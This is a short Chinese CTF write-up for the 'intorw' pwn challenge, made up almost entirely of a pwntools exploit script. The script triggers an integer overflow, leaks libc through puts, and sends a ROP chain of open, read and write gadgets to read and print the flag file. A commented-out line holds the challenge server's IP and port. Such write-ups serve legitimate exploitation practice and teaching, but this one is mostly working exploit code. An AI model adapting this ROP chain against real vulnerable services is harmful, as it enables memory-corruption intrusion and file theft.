这道题目就是很简单的整数溢出+rop。
exp
这个exp要区分本地的libc和远程的libc,具体我就不修改了,本地打就把后面的一个gadget的代码改一改。
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
elf = ELF('./intorw')
libc=ELF('./old_libc.so.6')
poprdi = next(elf.search(asm('pop rdi;ret')))
def look(sh):
gdb.attach(sh,"b *0x0400A40")
pause()
#sh = remote("43.143.7.97",28284)
sh = process(argv=['./intorw'])#,env={'LD_PRELOAD':'/home/gao/Desktop/intorw/libc.so.6'})
sh.sendlineafter("Please enter how many bits you want to read\n",str(2147483648))
main=0x00400A47
vuln=0x0004009C4
payload=b'a'*(0x20+8)+p64(poprdi)+p64(elf.got["puts"])+p64(elf.plt["puts"])+p64(vuln)
sh.sendlineafter(b"Please enter what you want to read:\n",payload)
libc_base = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
libc.address = libc_base
print("[*]")
print(hex(libc.address))
openn=libc.sym["open"]
write=libc.sym["write"]
read=libc.sym["read"]
print("[*]")
print(hex(openn))
print("[*]")
print(hex(write))
print("[*]")
print(hex(read))
gift=0x000601020
#poprdi = next(elf.search(asm('pop rdi;ret')))
poprdi=next(libc.search(asm("pop rdi;ret")))
poprsi=next(libc.search(asm("pop rsi;ret")))
poprdxr12=next(libc.search(asm("pop rdx;pop r12;ret")))
ret=next(libc.search(asm("ret")))
'''
总的目的就是实现open后的fd传入rdi,作为read的第一个参数。
我这样有一个好处,就是打开文件后直接传参数到rdi,不必去猜对方机器打开的fd是否是3。
'''
#这里是一个gadget,可以实现movrdirax
#偏移要自己找
movrdirax=next(libc.search(asm("mov edi,eax;cmp rdx,rcx")))
#为了上面的gadget不被影响,要使用下面的gadget
poprcxrbx=next(libc.search(asm("pop rcx;pop rbx;ret;")))
payload2=b'a'*(0x20+8)+p64(poprdi)+p64(gift+38)+p64(poprsi)+p64(0)+p64(poprdxr12)+p64(0)+p64(0)+p64(openn)
payload2+=p64(poprcxrbx)+p64(555)+p64(555)+p64(movrdirax)
payload2+=p64(poprsi)+p64(gift)+p64(poprdxr12)+p64(40)+p64(0)+p64(read)
payload2+=p64(poprdi)+p64(1)+p64(poprsi)+p64(gift)+p64(poprdxr12)+p64(40)+p64(0)+p64(write)
sh.sendlineafter("Please enter how many bits you want to read\n",str(2147483648))
#look(sh)
sh.sendafter("Please enter what you want to read:\n",payload2)
sh.interactive()